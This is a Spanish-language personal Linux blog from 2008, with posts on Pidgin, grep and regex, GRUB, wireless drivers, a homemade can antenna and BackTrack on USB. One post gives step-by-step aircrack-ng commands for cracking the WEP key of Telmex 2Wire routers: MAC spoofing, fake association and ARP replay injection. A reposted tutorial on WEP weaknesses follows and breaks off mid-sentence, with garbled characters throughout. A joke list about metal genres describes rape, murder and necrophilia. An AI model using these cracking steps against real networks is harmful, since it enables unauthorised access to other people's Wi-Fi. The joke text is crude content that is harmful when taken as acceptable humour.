Extiste un plugin llamado vimperator que modifica el navegador de tal forma que se comporta como el editor de textos VIM aqui dejo una screenshot con la consola no oficial de google...

http://goosh.org/

Free Image Hosting at www.ImageShack.us

05 junio, 2008

Pidgin - ver lista por e-mail

no se esto es personal. odio ver los contactos por su nick. por que nunca se sabe quien es quien. es por eso que siempre los veo por su direccion de e-mail,

ahorita ando en debian y para instalar el pidgin pues

apt-get install pidgin
apt-get install pidgin-plugin-pack

luego te vaz a herramientas / complementos / buddy list options ( de ahi a el boton de configurar complemento) despues en : show e-mail addresses

hay como otros 30 agregados mas. pero la verdad me da hueva provar que hace cada uno de ellos. algun dia que tenga tiempo lo hare.

Mi cuaderno geek

esto es el resultado de algunas calcas y algo de imaginacion , es el que uso ahorita en la universidad xD

04 junio, 2008

Dragon, princesa y rock and roll, y tu ¿cual eres?

En lo alto de un castillo hay una linda princesa. El castillo está custodiado por un temible dragón. Según el estilo del guerrero que vaya a rescatarla éste actuará de alguna de las siguientes formas:
POWER METAL
El protagonista llega al castillo en un caballo blanco alado, escapa del dragón, salva a la princesa, se van lejos y hacen el amor con mucho feeling.
TRUE METAL
El protagonista llega al castillo y vence al dragón en una batalla utilizando su espada. Bañado en la sangre del dragón, lo hace con la princesa mediante el coitus interruptus.
THRASH METAL
El protagonista llega la castillo, pelea con el dragón, salva a la princesa y se la tira por todos lados, anual, mensual y oral 10 veces en toda la noche.
HEAVY METAL
El protagonista llega al castillo en una Harley Davidson prestada, mata al dragón, se toma unas chelas con la princesa, fuma un porrito y después lo hacen relajados y con mucha paciencia.
FOLK METAL
El protagonista llega con varios amigos tocando el acordeón, el laud, el violín, y otros instrumentos extraños y antiguos. El dragón se queda dormido y cansado de tanto danzar, y luego se van bebiendo garrafas de vino… sin la princesa. La princesa se hace justicia con su propia mano.
VIKING METAL
El protagonista llega en un navío, mata al dragón con un hacha, lo cocina y se lo come. Viola contranatura a la princesa y la deja tirada en el bosque a merced de los lobos, saquea el castillo y le prende fuego y se va cantando “yohoho y una botella de ron “.
DEATH METAL
El protagonista llega, mata al dragón, clava a la princesa, la mata, le escupe la cara, le corta un mechón de pelo para una brujería y se va.
BLACK METAL
Llega de madrugada con luna llena, en medio de la neblina, golpea al dragón y aún vivo lo empala frente al castillo. Sodomiza a la princesa todo el fin de semana, le corta la lengua con una daga y bebe su sangre en un ritual antes de matarla. Después descubre que ella no era virgen y la empala junto al dragón, y se va con la cabeza agachada sin mirar a nadie.
GORE METAL
Llega, mata al dragón. Sube al castillo, se tira a la princesa sin lubricante y la mata. Después de muerta se la vuelve a tirar. Quema el cadáver de la princesa y se la tira de nuevo, y se lleva un hueso de la pierna de recuerdo.
DOOM METAL
Llega al castillo, ve el tamaño del dragón, se deprime, bota una sola lágrima y se suicida. El dragón se come el cadáver del protagonista, masturba a la princesa con la lengua del protagonista y después se come a la princesa.
NU METAL
Llega al castillo y se jacta de lo bueno que es peleando en la Nintendo y de que es capaz de ganarle al dragón. Pierde miserablemente como una basura humana y queda hecho mierda. Huye cobardemente y encuentra a la princesa, le cuenta su trágica y abusada infancia. La princesa lo echa de allí y se va a buscar al protagonista de “Heavy Metal“. El protagonista “Nu” se toma un Red Bull y se va a grabar un disco de “The best of” y a comprar el último modelo de skate board.
ROCK N’ ROLL CLÁSICO
Llega en una moto destartalada fumándose un troncho y se lo ofrece al dragón, que resultó que era su brother. Luego acampa con la princesa en la parte más apartada del jardín, y después fumarse hasta el pasto del jardin y mucho sexo, y rock n’ roll, tiene una sobredosis de LSD y muere ahogado en su propio vómito. La princesa se vuelve adicta y se vuelve prostituta.
PUNK
Le tira una piedra al dragón y huye a buscar mas punkies. Pinta la “A” de anarquía en un muro del castillo y se siente realizado. Le hace un peinado tipo “mohicano” a la princesa y abre un kiosko de fanzines en el pasadizo del castillo, y habla de todo lo que lograría si sacara un disco compilado.
PROGRESIVO
Llega, toca un solo dizque-virtuoso de guitarra de 26 minutos. El dragón se mata de aburrimiento. Llega donde la princesa y toca otro solo explorando todas las técnicas de tonos y compases aprendidas en el último año en el conservatorio. La princesa se aburre y huye buscando al protagonista de “Heavy Metal“.
HARD ROCK
Llega al castillo en un convertible rojo, acompañado de dos rubias pechugonas (una es travesti) y tomándose una botella de Jack Daniels. Mata al dragón con un cuchillo y luego hace una orgía con las rubias y la princesa, se toma fotos en pose de ruco y luego chantajea a la princesa.
GLAM
Llega al castillo. El dragón suelta tantas carcajadas al verlo que lo deja pasar. Entra al castillo, roba la laca, el delineador, el portaligas y el lapiz labial de la princesa. Luego convence al dragón de pintar el castillo de rosado y hacerse unos rayitos, usar pañoleta fucsia con bolas amarillas y usa a la princesa de peinadora y manicurista. La princesa se vuelve lesbiana y zoofilica con el perro del castillo.
GRUNGE
Llega al castillo, no mira al dragon porque su peinado le tapa los ojos. Enchufa su guitarra y amplificador baratos, y trata de matar al dragón con sus sonidos repetitivos y distorsionados, tira su guitarra contra el dragón y lo mata de un golpe en la cabeza. Lleva a la princesa a su cama, están los dos en la cama y se mata metiéndose un tiro en la cabeza. La princesa hereda su guitarra y amplificador.

27 mayo, 2008

1 año con el blog

pues si ya lleva 1 año y ya no se que ponerle. xD sugieran algo

13 mayo, 2008

RegEx

Si ponemos un punto, se puede sustituir por una sola letra.

CHIL. CHILE, CHILI, CHILO

Si ponemos un *, va a ser sustituido por 0 o màs repeticiones del caracter que lo precede

AP*LE ALE, APLE, APPLE, APPPLE

Si ponemos un corchete, la expresion podrá contener los caracteres que estén indicado dentro del corchete una sola vez.

[Cc] hicken Chicken, chicken

es possible indicar un rango de caracteres entre los corchetes, que serán las que se busquen dentro de la cadena regular

sustituiremos dentro de la expression regular cualquier letra que esté contenida en ese rango

[a-z A-z] hicken ahicken, bhicken, chicken, dhicken ….

Ahicken, Bhicken, Chicken, Dhicken ….

Si queremos indicar que queremos hacer una busqueda al comienzo de una linea irá precedida por ^.

^Buf busca dentro de todas las lineas solo las 4 primeras letras en que coincida con las letras Buf

Si la hacemos al final, se coloca como ultimo caracter un $

Sonp$ al final de cada linea las letras sonp en las últimas 4 posiciones

Las expresiones regulares se usan normalmente con greep.

$ grep `chicken' receta.txt todas las lineas del fichero en las que aparezca chicken

$ grep `chicken' * En cualquiera de los ficheros del subdirectorio actual

$ grep `eh.*se' recetas.txt con el punto cualquier caracter unico, con el * 0 o n repeticiones todo lo que empieze por ch y acabe por se.

$ grep `^\.D[SE]$' fichero.txt cualquier cosa que sea .D o .dse al comienzo o al final.

$ file * | grep -v text eliminariamos todos los ficheros que no fueran de texto

$ grep -l `hola' * buscar en todoss los ficherso del subdirectorio, los que contentga la palabra hola y muestra el nombre del fichero donde aparezca.

EGREP

Expresiones regulares de forma extendida.

Los parametros son iguales que el grep, pero los reconoce de manera más exacata y precisa.

FGREP

No es posible usar expresiones regulares, siempre hay que usar expresiones fijas

Permite realizar operaciones de búsqueda múltiple. Permite expresar varias palabras al mismo tiempo, cosa que con lo de antes es imposible

/ Fgrep primerapalabra+intro

Se pone el prompt secundario

*

palabra2
*

palabra3

Para acabar se pone el nombre del fichero a buscar y luego Ctrl + D

*

fichero
*

Ctrl + D

Se puede indicar introduciendo las palabras a buscar en un fichero (en distintas lineas)

/ fgrep -f palabras.dat ficherobusqueda

Hacer los ejercicios del grep (incluyen expresiones regulares con corchete) con egrep

Sobre el listado del subdirectorio /usr localice los subdirectorios de los miembros de cada grupo.

Nombres.dat nombres de login

CUT

Permite recortar las columnas o caracteres delimitadas por algun carácter de marca de columnas.

La sintaxis es:

$ cut [-opc] file/s

las opciones son:

*

-c indicamos que lo que se desea es cortar exclusivamente columnas que en principio estarán separadas por comas.
*

-f indicamos que lo que se desea recortar son campos, por lo tanto, el fichero deberá estar formateado con respecto a informaciones que se estructuren en el formato de registro subdividido en campos. Un ejemplo:
o

ofertas
o

especialidades

a continuación del -f iran los numeros de columna que para cada fila del fichero se quisieran recortar. La forma de indicar columnas es igual que en la orden sort, a diferencia, que en este caso no es necesario precisar el tipo de columna.

-f 1 -5 Cortaria desde la 1 hasta la 5 inclusive

-f 1 5 solo la una y la 5

*

-d indicamos el carácter separador de campo
+

-d :

Por ejemplo:

Queremos cortar la 1,3 y 5 del agenda.new

Put -d: -f 1 -3,5 agenda.new

Sustituir los : por el carácter tabulacion

$ cut -d: -f 2 -4 agenda.new | sed `s/:/^t/g'

04 mayo, 2008

Configurar el grub graficamente


pues si. asi como se escucha, existe esta herramienta que configura el grub de manera gráfica se trata de startupmanager_1.9.10-1_all.deb


$ startupmanager

Ahi se edita nuestro archivo de /boot/grub/menu.list

siempre lo he editado a mano pero esta GUI en lo particular me agrado por que te ahorra tiempo a la hora de crearte un bootsplash (imagen de grub) con un simple click (antes lo hacia con gimp y comprimia a mano)

la resolucion de la pantalla
colores de texto y fondo
contraseñas
el orden de los kernel (si ... eso tambien o.o)
oh si y el tiempo de espera

asi que ya lo saben esta herramienta la estoy utilizando en debian. supongo que en ubuntu funciona bien =)

29 abril, 2008

quitar ipv6 en debian

bragas:/etc# vi /etc/modprobe.d/aliases

alias net-pf-10 ipv6
cambiar por
alias net-pf-10 off

debian ipw2200 con centrino

Hola pues quite el mandriva y puse el debian. hacia rato que no la usaba y lo primero que me tope fue el wireles. pues aqui dejo como configurar su wifi con una ipw2200

al ver que tarjeta tengo esta es la mia
lscpi
02:02.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05)


yo solo necesite el firmewire descargalo aquí
http://ipw2200.sourceforge.net/firmware.php

neo@bragas:~/Desktop$ ls
ipw2200-fw-3.0.tgz

descomprimimos el paquete
neo@bragas:~/Desktop$ tar -zvxf ipw2200-fw-3.0.tgz
ipw2200-fw-3.0/
ipw2200-fw-3.0/ipw2200-bss.fw
ipw2200-fw-3.0/ipw2200-sniffer.fw
ipw2200-fw-3.0/LICENSE.ipw2200-fw
ipw2200-fw-3.0/ipw2200-ibss.fw

neo@bragas:~/Desktop$ su
Password:tresasteriscosxD

bragas:/home/neo/Desktop# ls
ipw2200-fw-3.0 ipw2200-fw-3.0.tgz

copiamos todo a /usr/lib/hotplug/firmware
bragas:/home/neo/Desktop# cp /home/neo/Desktop/ipw2200-fw-3.0/*.* /usr/lib/hotplug/firmware/

quitamos los modulos ipw2200 y ieee8021, y luego los recargamos
bragas:/home/neo/Desktop# rmmod ipw2200
bragas:/home/neo/Desktop# rmmod ieee80211
bragas:/home/neo/Desktop# modprobe ipw2200
bragas:/home/neo/Desktop# iwlist eth1 s
eth1 Scan completed :
Cell 01 - Address: 00:1D:7E:94:22:A8
ESSID:"linksys-g"
Protocol:IEEE 802.11bg
Mode:Master
Channel:6
Encryption key:off
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Quality=98/100 Signal level=-15 dBm
Extra: Last beacon: 152ms ago



sencillo, no? siempre que tengas alguien que te pueda ayudar, espero les sirva a alguien mas.

14 abril, 2008

FLISOL 2008 en Guadalajara Cucea Linux Cabal

FLISOL 2008 en Guadalajara

(Festival Latinoamericano de Instalación de Software Libre)

Es un evento a nivel Latinoamericano para la instalación de "Software Libre" distribuido en eventos en cada país. Tiene como propósito promover el uso del "Software Libre" y la integración de comunidades de usuarios de "Software Libre" en todos los países de Latinoamerica. FLISOL - 2008

En el FLISOL se hablará sobre todos los sistemas operativos, programas y demas accesorios libres.

La comunidad de software libre ha crecido lo suficientemente en los últimos 20 años para brindar
alternativas de sistemas operativos y todas las aplicaciones que usamos del software propietario.

Linux Cabal

Programa

Hora Tema Ponente
11:00 - 12:00

12:00 - 13:00

13:00 - 14:00 rsync & Symfony Renich
14:00 - 15:00 Un HotSpot simple (NO-CAT) WiFi Adrián Navarro
(janux)
15:00 - 16:00 Multi Terminales con Xephyr
Roberto Noe Villegas Fernandez
( ville1ero )
Festival

de

Instalación
16:00 - 17:00 Introducción a macros en OpenOffice.org usando MySQL Juan Arturo Ramos
17:00 - 18:00 ZABBIX (Herramienta para monitoreo de servidores) Juan Servando Sanchez C
E
N
A
18:00 - 19:00 Novedades en UBUNTU 8.04 Cristian Trujillo
19:00 - 20:00 RegEX Bernardo Barajas
20:00 - 21:00 Charla con la comunidad



CUCEA
Fecha: 26 DE ABRIL
Lugar: Auditorio CERI
Hora: De 8:00 a 29:00 hrs.
    PROGRAMA
  • 8:20 - 8:45 Registro FLISOL 2008
  • 8:46 - 8:55 Inaguración FLISOL 2008
  • 9:00 - 9:45 Software Libre y propietario compitiendo en mi espacio Jalia Sue
  • 9:46 - 9:59 Preguntas y Respuestas, Cambio de Ponente
  • 10:00 10:45 Manejo Eficiente de la Consola Patricio Páez & Thomas Bliesener
  • 10:46 - 10:59 Preguntas y Respuestas, Cambio de Ponente
  • 11:00 - 11:45 Rsync en Teoría y Práctica Thomas Bliesener RevistaSL "software libre hecho revista" Carlos Augusto
  • 11:46 - 11:55 Preguntas y Respuestas, Cambio de Ponente
  • 12:00 - 12:45 Virtualización con Xen Jesús Velázquez
  • 12:46 - 12:55 Preguntas y Respuestas, Cambio de Ponente
  • 13:00 - 14:45 Taller 1 Instalación de Linux. Goby
    Taller 2 Administración Básica de FeeBSD
    Alejandro Acosta"The_Tre"
    Taller 3: Web 2.0 Josue Gutierrez "BlacKNash"
  • 15:00 - 16:00 Comida
  • 16:01 - 16:45 Suite de Seguridad con GnuGP Jorge Emerson Posadas "Toxickore" Mysql ABC Jorge Medrano “h1pp1e”
  • 16:46 - 16:55 Preguntas y Respuestas, Cambio de Ponente
  • 17:00 - 17:45 Un día Desarrollando en la vida real con software libre.
    Mahomedalid Pacheco "Maho"
  • 17:46 - 17:55 Preguntas y Respuestas, Cambio de Ponente
  • 19:00 Clausura FLISOL



09 abril, 2008

Nuevo foro Mandriva-es


Mandriva ya tiene portal en español . un foro y noticias se trata de:

http://www.mandriva-es.org/


Visitalo =)

01 abril, 2008

Backtrack 2 en Pendrive USB



hola. pues esta la vi por ahi. tener backtrack en nuestra llave usb esto es muy util =)

1) Particionar y formatear la usb en Fat32. podemos usar gparted para esto,
recuerda poner la flag de boot ! ademas el cd es de 700 megas. menos espacio no sirve. la memoria de 1 gb cuando menos yo uso una de 2 gb

2) metemos la usb y el cd de backtrack... ( o montamos la iso con mount -r -o loop /rutadelaiso /montaraqui)

en mi caso

/media/disk
/media/usb

entramos en el cd

cd /media/disk

y ponemos

cp -r * /media/usb

tardara un rato en copiar asi que sean pacientes

nos quedan dos directorios

/boot /bt


entramos en /boot

./bootinst.sh


instalamos el MBR... listo =)

tambien puedes probar que el usb con qemu

$ qemu -boot c -usb /dev/sda1

31 marzo, 2008

split y cat ...trasladar archivos grandes

hace poco se me presento este problema... mi laptop no tiene grabadora de dvd... -.-¿
y baje una iso de 4.3 gb. dije "ok lo pasare a un disco duro extraible " ... ups.. era fat32. y no soporta un archivo tan grande. error de ahi no salia.

decidi hacer una partición etx3 en el disco duro externo y copiar el archivo... WTF tampoco... ok

buscando por ahi y mirando mis errores encostre split con el cual puedes cortar un archivo grande. supongo que también aplicara para vídeo. o cualquier otro archivo de semejante dimensiones

hacemos esto

split nombrearchivo -b 1000m

con esto decimos recorta el archivo en pedazos de 1000 megas. por default creara

xaa xab xac xad --- etc
estos los podemos mover =)


para pegarlos

cat xaa xab xac xad > nombrearchivo

tengo entendido que hay que poner bien el orden ya que los acomodara en ese orden...

25 marzo, 2008

Montar una red ad-hoc

bueno. esto es útil para cuando quieran... jugar. pasar información por ssh, sftp, ftp o alguna otra cosa. básicamente es una red punto a punto. entre pocos equipos. cuando no tenemos un cable cruzado


en una pc ponemos

iwconfig dispositivo mode ad-hoc essid nombredelared channel #
ifconfig dispositivo ip

Pc 1
iwconfig eth1 mode ad-hoc essid test channel 1
ifconfig eth1 192.168.1.1

Pc 2
iwconfig eth1 mode ad-hoc essid test channel 1
ifconfig eth1 192.168.1.2

19 marzo, 2008

Configuracion 2wire Infinitum borrar equipos

Pues una duda que me ha quedado es la siguiente... como borrar los equipos que han sido conectados al 2wire? si hay 2 o 3 no hay problema pero si hay mas 20. ? bueno para esto podemos entrar a configurar el 2wire. si damos un

netstat -nr
arp -a

podremos ver la gateway. por defecto casi siempre esta la 192.168.1.254 pero tambien pueden estar...

192.168.0.1
10.0.0.1
192.168.1.1
http://gateway.2wire.net/
http://home/


pero hay un menu mas avanzado que es el

http://gateway.2wire.net/management



de ahi vamos a
/Resolución de problemas /Restablecimientos / borrar red local,
que dice asi.

Borra todos los dispositivos de la lista de red local. Los dispositivos de red aparecerán en la lista si se hubieran vuelto a detectar.

y listo asi se borra

12 marzo, 2008

Tarjetas wireless definiciones:

  • Ad-hoc: estas redes se construyen normalmente con ordenadores con las tarjetas "normales" y se configuran de modo que todos los ordenadores de la red trabajan "par a par", todos reciben los paquetes de todos y envían sus propios paquetes a todos los ordenadores de la red. Para esto no se necesita nada especial, sólo definir una red con un nombre (ESSID), preferiblemente encriptar a 128 bits (con WEP) y no tener demasiados ordenadores en la misma red.

  • Managed: en este caso exite un servidor independiente, Access Point (o Base Station en terminología comercial de Apple) al cual se conectan todos los ordenadores. El access point entonces envía las tramas 802.11 a los destinatarios finales. Normalmente los access points soportan roaming, es decir los clientes pueden estar en movimiento a ir cambiando de punto de acceso de acuerdo a la potencia de la señal. La diferencia fundamental entre una tarjeta que soporte ser access point (o modo master) es que hay que hacer bridging de paquetes IP y además manipulan los bits de 802.11 a bajo nivel, normalmente en la propia tarjeta. También los access points suelen ofrecer servicios de enrutado IP, servidor DHCP y bridging sobre una Ethernet. Cuando un ordenador o tarjeta está conectado a la red a través de un punto de acceso se dice que está en modo managed.

  • Master: es el modo en que trabaja el access point descrito en el punto anterior. Como veremos al final, es posible también fabricar un access point con Linux.

07 marzo, 2008

quitar KDE

en mandriva...

urpme -v --auto --force -a kde

en debian

apt-get autoremove kde

aunque es mejor no instalarlo xD

24 febrero, 2008

inyeccion con ipw2200 sobre 2Wire de Telmex con wep de 64 bits

Muchos me decían que tenia que parchar pero no hay necesidad bueno lo que se necesita es:
1)
el paquete de aircrack-ng-0.9.1.tar.gz
el live cd backtrack2 ( o el que quieran pero que el kernel sirva xD)
tu superhiperultracheverechido modulo (tengo una thinkpad R50e) ipw2200

bueno comenzamos muchos mousedependientes me preguntan como hacerlo aqui pongo como lo hago yo:

tengo entendido que solo se pueden usar los ataques con este metodo

2 (--interactive)
3 (--arpreplay)
4 (--chopchop)


2)primero haz un scan con

iwlist dispositivo scan

y apunta el mac del AP y el canal esto es importante

3) opcional compila e instala el aircrack siempre lo hago xD ----
descarga wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz
descomprime tar -zxvf aircrack-ng-0.9.tar.gz
entra en el directorio cd aircrack-ng-0.9
compila e instala make
make install
----------------------------------------------------------------

4)ahora activamos la interfaz de rtap

quitamos el modulo de ipw2200
modprobe -r ipw2200

si ponemos
modinfo ipw2200
parm: rtap_iface:create the rtap interface (1 - create, default 0) (int)
podremos ver las opciones que tiene el modulo y de ahi podemos mirar rtap_iface

cargamos el modulo con esa opcion =)
modprobe ipw2200 rtap_iface=1

con esto activamos la interfaz rtap

5)ahora tenemos que hacer una asociación a el AP dar una clave falsa o fake esto se tiene que hacer antes de aireplay

iwconfig eth1 ap macdelap
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed

6)levantamos las interfaces

ifconfig eth1 up
ifconfig rtap0 up

si en este paso ponemos iwconfig para ver la asociación , podremos verla en el dispositivo eth1...

7)ahora corremos airodump para capturar paquetes con la interfaz rtap0
airodump-ng --channel --bssid -w jijoju rtap0
en channel ponemos el canal del ap
el bssid del ap
-w le dice que cree un archivo llamado jijoju
rtap0 es la interfase a usar
despues nos dice que clientes hay conectados

8)ahora abrimos aireplay
aireplay-ng --arpreplay -x 1024 -b bssid ap -h tumac -i rtap0 eth1
--arpreplay es el ataque
-x es el numero de paquetes por segundo
-b bssid del ap
-h tumac adress (puedes cambiarla (siempre lo hago) usando ifconfig eth1 hw ether 00:11:22:33:44:55 o lo que se te ocurra)
-i que capture de este dispositivo (s)


9)esperamos un rato yo me espero a las 100000 iv's

despues con aircrack, en este caso era de 64 bits asi que pongo el parametro , si es de 128 bits pon 128 en lugar de 64 =) si quieres una taque con PTW pon -z

aircrack -n 64 archivo.cap
aircrack -z archivo.cap (ataque ptw)




tiempo estimado ... 10 minutos
mas info aqui

23 febrero, 2008

Iron Maiden en Guadalajara

asi es, despues de mucho... mucho... bastante... tiempo de esperar por fin pude ir a un concierto de iron maiden. en vivo no tienen madre son muy chingones el concierto estuvo exelente, sublime que mas da despues de gritar por mas de 2 horas y guardar un boleto por mas de 3 meses...
Free Image Hosting at www.ImageShack.us eso y un video de mala calidad... xD

21 febrero, 2008

ten suerte en google

si pones find chuck norris y voy a tener suerte




xD

14 febrero, 2008

Calico Jack en mi wireless

le he puesto un pequeño detalle a mi lata

12 febrero, 2008

Mi antena Wireless

bueno pues ya me he creado mi propia antena basandome en la antena de patatas de bote, el material que se necesita para esto es:

1 bote de hojalata en mi caso diametro 10 cm y largo 31 cm
1 conector tipo N macho
1 conector tipo N hembra
cable lmr 200 , 300 o 400. ( yo use el lmr 200 de 3 metros por su facilidad de manejo aunque no tiene tanto blindaje como los otros y costo)
1 usb wireless chipset Zydas ( linux las reconoce simplemente conectandolas )
1 alambre de cobre

navaja
cautin
soldadura
pinzas
tornillos

pues primero y la parte mas dificil a mi parecer es onseguir el cable y los ocnectores tipo N , son un poco costosos y aqui en mi ciudad solo encontre a 1 que los vende, pero en internet en paginas de ventas pueden conseguirlos. uso un N macho y un SMA


la usb wireless que uso chipset zydas


el hoyo lo he hecho a 1/3 de la lata

y quedo maso o menos asi


al conector tipo N le he soldado el alambre de cobre en mi caso de 5 cm


luego montamos el conector N en el bote


ahora conectamos la lata


ahora si buscamos redes con la tarjeta integrada de la laptop


y ahora con la antena


para hacer la perforacion de la lata existen calculadoras , busquen en google "cantena calculator"

hagan su antena :)


si buscas mas potencia aunque la verdad esa cosa esta mal montada , creo que seria mejor una lata mas pequeña para esta antena


es direccional asi que hay que apuntar y tener suerte.

29 enero, 2008

Cracking 2WIRE's Routers by Crypkey

Cracking 2WIRE's Routers by Crypkey

< crypkey at gmail dot com >

Jorge Trujillo www.zonartm.org

==========================================================



Index

0.- Introducci~n

1.- Entendiendo W3P

2.- Requerimientos

3.- Configurando e instalando

4.- 2W1R3 W3P 0wn3d!

5.- Agradecimientos

6.- Referencias



Introducci~n



RTM Security no se hace responsable por el uso de este documento, este texto
esta tiene como lucro la educaci~n y el conocimiento.

Este documento primero da una pequeña introducci~n al algoritmo de cifrado
W3P que usan la mayor~a de los routers, un buen ejemplo son los famosos
2WIRE's. Entender~n que es W3P, como funciona y por que es tan vulnerable.
Asimismo el documento esta enfocado en el cracking de la llave WEP de
routers 2WIRE's con una tarjeta wireless y un programa que mas adelante se
hablara.

1.- Entendiendo
WEP Bueno vamos a dar una pequeña introducci~n a WEP de su funcionamiento
entre otras cosas que ver~n a continuaci~n. WEP (Wired Equivalent Privacy) es el algoritmo opcional de seguridad para brinda r "protecci~n " a las redes inal~mbricas, incluido en la primera versi~n del est~ndar IEEE 802.11, mantenido sin cambios en las nuevas 802,11a
y 802.11b, con el fin de garantizar compatibilidad entre distintos
fabricantes.

El WEP es un sistema de cifrado est~ndar implementado en la
MAC y soportado por la mayor~a de las soluciones inal~mbricas, supongo que
hasta aqu~ vamos bien, pasemos a la parte de cifrado.

Cifrado:
WEP utiliza una clave secreta compartida entre una estaci~n inal~mbrica
Illustrated, Volume 1 The Protocols (Richard Stevens, Addison-Wesley)
y un punto de acceso. Todos los datos enviados y recibidos entre la estaci~n y el
punto de acceso pueden ser cifrados utilizando esta clave compartida. El est~ndar
802.11 no especifica c~mo se establece la clave secreta, pero permite que haya
una tabla que asocie una clave exclusiva con cada estaci~n. En la pr~ctica
general, sin embargo, una misma clave es compartida entre todas las estaciones y
puntos de acceso de un sistema dado.

Para proteger el texto cifrado frente a modificaciones no autorizadas mientras
est~ en tr~nsito, WEP aplica un algoritmo de comprobaci~n de integridad
(CRC-32) al texto en claro, lo que genera un valor de comprobaci~n de
integridad (ICV). Dicho valor de comprobaci~n de integridad se concatena con el
texto en claro. El valor de comprobaci~n de integridad es, de hecho, una
especie de huella digital del texto en claro. El valor ICV se añade al texto
cifrado y se env~a al receptor junto con el vector de inicializaci~n. El
receptor combina el texto cifrado con el flujo de clave para recuperar el
texto en claro. Al aplicar el algoritmo de integridad al texto en claro y
comparar la salida con el vector ICV recibido, se puede verificar que el
proceso de descifrado ha sido correcto ~ que los datos han sido
corrompidos. Si los dos valores de ICV son id~nticos, el mensaje ser~
autenticado y woala!

Autenticaci~n:

WEP proporciona dos tipos de autenticaci~n: un sistema abierto, en el que todos
los usuarios tienen permiso para acceder a la WLAN, y una autenticaci~n mediante
clave compartida, que controla el acceso a la WLAN y evita accesos no autorizados
a la red. De los dos niveles, la autenticaci~n mediante clave compartida es el
modo "seguro ". E n ~l se utiliza una clave secreta com partid a entre tod as las
estaciones y puntos de acceso del sistema WLAN. Cuando una estaci~n trata de
conectarse con un punto de acceso, ~ste replica con un texto aleatorio, que
constituye el challenge. La estaci~n debe utilizar la copia de su clave secreta
compartida para cifrar el texto de desaf~o y devolverlo al punto de acceso, con
el fin de autenticarse. El punto de acceso descifra la respuesta utilizando la
misma clave compartida y compara con el texto de desaf~o enviado anteriormente.
Si los dos textos son id~nticos, el punto de acceso env~a un mensaje de
confirmaci~n a la estaci~n y la acepta dentro de la red. Si la estaci~n no
dispone de una clave, o si env~a una respuesta incorrecta, el punto de acceso la
rechaza, evitando que la estaci~n acceda a la red.

Es bueno asegurarse de que WEP est~ habilitado siempre que se requiera un
mecanismo de autenticaci~n seguro. Incluso, aunque est~ habilitada la
autenticaci~n mediante clave compartida, todas las estaciones inal~mbricas de
un sistema WLAN pueden tener la misma clave compartida, dependiendo de c~mo
se haya instalado el sistema.

En tales redes, no es posible realizar una autenticaci~n individualizada;
todos los usuarios, incluyendo los no autorizados, que dispongan de la
clave compartida podr~n acceder a la red. Esta debilidad puede tener
como resultado accesos no autorizados, especialmente si el sistema incluye
un gran n~mero de usuarios. Cuantos m~s usuarios haya, mayor ser~ la
probabilidad de que la clave compartida pueda caer en manos inadecuadas, que
es lo que haremos en el capitulo 4, pero veamos un poco mas de WEP y su
algoritmo.

Algoritmos

El algoritmo de encriptaci~n utilizado es RC4 con claves (seed), seg~n el
est~ndar, de 64 bits. Estos 64 bits est~n formados por 24 bits
correspondientes al vector de inicializaci~n m~s 40 bits de la clave secreta.
Los 40 bits son los que se deben distribuir manualmente.

Veamos con funciona WEP:

1. Se calcula un CRC de 32 bits de los datos. Este CRC-32 es el metodo que
propone WEP para garantizar la integridad de los mensajes (ICV,
Integrity Check Value).

2. Se concatena la clave secreta a continuaci~n del IV formado el seed.

3. El PRNG (Pseudo-Random Number Generator) de RC4 genera una secuencia de
caracteres pseudoaleatorios (keystream) a partir del seed de la misma longitud
que los bits obtenidos en el punto 1.

4. Se calcula la O exclusiva (XOR) de los caracteres del
punto 1 con los del punto 3. El resultado es el mensaje cifrado.

5. Se env~a el IV (sin cifrar) y el mensaje cifrado dentro del campo de datos
(frame body) de la trama IEEE 802.11.
ver [ crack_wep-000001 ]
El algoritmo para descifrar es similar al anterior. Debido a que el otro extremo
conocer~ el IV y la clave secreta, tendr~ entonces el seed y con ello podr~
generar el keystream. Realizando el XOR entre los datos recibidos y el keystream
se obtendr~ el mensaje sin cifrar (datos y CRC-32), luego se comprueba que el
CRC-32 es correcto.
Ahora veamos por que WEP es vulnerable, que hace que teniendo cualquier numero
de bits de key se pueda romper, as~ que analicemos un poco m~s a fondo esto.

Vulnerabilidad WEP

La implementaci~n del vector de inicializaci~n (IV) en el algoritmo WEP tiene
varios problemas de seguridad. Recordemos que el IV es la parte que var~a de
la clave (seed) para impedir que un posible atacante recopile suficiente
informaci~n cifrada con una misma clave.

Sin embargo, el est~ndar 802.11 no especifica c~mo manejar el IV; se
indica que deber~a cambiarse en cada trama para mejorar la privacidad, pero no
obliga a ello. Queda abierta a los fabricantes la cuesti~n de c~mo variar el
IV en sus productos. La consecuencia de esto es que buena parte de las
implementaciones optan por una soluci~n sencilla: cada vez que arranca una
tarjeta wireless, se fija el IV a 0 y se incrementa en 1 para cada trama. Esto
ocasiona que las primeras combinaciones de IVs y clave secreta se repitan muy
frecuentemente. M~s a~n, si tenemos en cuenta que cada estaci~n utiliza la
misma clave secreta, por lo que las tramas con igual clave se multiplican en el
medio. Por otro lado, el n~mero de IVs diferentes no es demasiado elevado
(2^24=16 millones aprox.), por lo que terminar~n repiti~ndose en cuesti~n de
minutos u horas. El tiempo ser~ menor cuanto mayor sea la carga de la red. Lo
ideal ser~a que el IV no se repitiese nunca, pero como vemos, esto es imposible
en WEP. La cantidad de veces que se repite un mismo IV depender~ de la
implementaci~n elegida para variar el IV por el fabricante (secuencial,
aleatoria, etc.) y de la carga de la red.

La longitud de 24 bits para el IV forma parte del est~ndar y no puede cambiarse;
existen implementaciones con claves de 128 bits (lo que se conoce como WEP2),
sin embargo, en realidad lo ~nico que se aumenta es la clave secreta (104 bits)
pero el IV se conserva con 24 bits. El aumento de la longitud de la clave
secreta no soluciona la debilidad del IV.

Si se han capturado varias tramas con igual IV, es decir, con igual keystream,
solo se necesita conocer el mensaje sin cifrar de una de ellas, haciendo el XOR
entre un mensaje sin cifrar y el mismo cifrado, nos dar~ el keystream para
ese IV. Conociendo el keystream asociado a un IV, se puede descifrar todas las
tramas que usen el m ism o IV y asi poder descifrar la grandiosa "shared key".

Espero que no se hayan perdido, aunque me parece muy facil de entender todo lo
